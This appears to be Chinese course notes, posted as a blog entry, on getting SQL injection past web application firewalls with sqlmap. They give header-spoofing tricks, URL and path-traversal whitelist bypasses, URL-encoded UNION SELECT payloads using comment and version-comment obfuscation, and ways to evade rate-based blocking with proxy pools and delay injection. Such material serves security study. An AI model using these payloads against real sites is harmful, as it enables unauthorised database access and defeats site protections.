<小迪安全>19-SQL注入之sqlmap绕过WAF

  • 在攻防实战中,往往需要掌握一些特性,比如服务器、数据库、应用层、WAF层等,以便我们更灵 活地去构造Payload,从而可以和各种WAF进行对抗,绕过安全防御措施进行漏洞利用
  • 绕过方法

1.白名单

方式一:IP白奖单
从网络层获取的ip,这种一般伪造不来,如果是获取客户端的IP,这样就可能存在伪造IP绕过的情况。
测试方法:修改http的header来bypass waf
x-forwarded-for
x-remote-IP
x-originating-IP
x-remote-addr
x-Real-ip


方式二:静态资源
特定的静态资源后缀请求,常见的静态文件(.js .jpg .swf .css等等),类似白名单机制,waf为了检测
效率,不去检测这样一些静态文件名后缀的请求。
http://10.9.9.201/ sql.php?id=1
http://10.9.9.201/sql.php/1.js?id=1
备注: Aspx/php只识别到前面的.aspx/.php后面基本不识别


方式三:url白名单
为了防止误拦,部分waf内置默认的白名单列表,如admin/manager/system等管理后台。只要url中存在
白名单的字符串,就作为白名单不进行检测。常见的url构造姿势:
http://10.9.9.201/sql.php/admin.php?id=1
http://10.9.9.201/sql.php?a=/manage/&b=../etc/passwd
http://10.9.9.201/../../../ manage/../sql.asp?id=2
waf通过/manage/"进行比较,只要uri中存在/manage/就作为白名单不进行检测,这样我们可以通
过/sql.php?a=/manage/&b=../etc/passwd 绕过防御规则。


方式四:爬虫白名单
部分waf有提供爬虫白名单(各大浏览器的爬虫)的功能,识别爬虫的技术一般有两种:
1、根据useragent
2、通过行为来判断
UserAgent可以很容易欺骗,我们可以伪装成爬虫尝试绕过。User Agent switcher (Firefox附加组
件),下载地址:
https : //addons.mozilla.org/en-us/firefox/addon/user-agent-switcher/

payload
%23==》url编码==》#
%0a==》url编码==》换行
%20==》url编码==》空格


%23x%0aunion%23x%0Aselect%201,2,3


%20union%20/*!44509select*/%201,2,3 /*!44509select*/:通过插入版本号(4.45.09),
绕过检测机制


%20/*!44509union*/%23x%0aselect%201,2,3


id=1/**&id=-1%20union%20select%201,2,3%23*/ 特殊符号


%20union%20all%23%0a%20select%201,2,3%23

 sqlmap

https://www.cnblogs.com/hongfei/p/3872156.html

注入点检测不到

1.--tamper自带绕过脚本,实战中需要自己写脚本

2.sqlmap包自带工具头

<小迪安全>19-SQL注入之sqlmap绕过WAF_第1张图片

  •  日志分析:防护拦截

 <小迪安全>19-SQL注入之sqlmap绕过WAF_第2张图片

  •  工具拦截

 <小迪安全>19-SQL注入之sqlmap绕过WAF_第3张图片

 解决方法

一:随机agent头部

 二:对于流量防护

        2.1采用搜索引擎的头部

         2.2采用延时注入

         2.3使用代理池

         2.4py脚本(二次开发

<小迪安全>19-SQL注入之sqlmap绕过WAF_第4张图片

 中转脚本!!!

 

你可能感兴趣的:(安全入门,安全,web安全)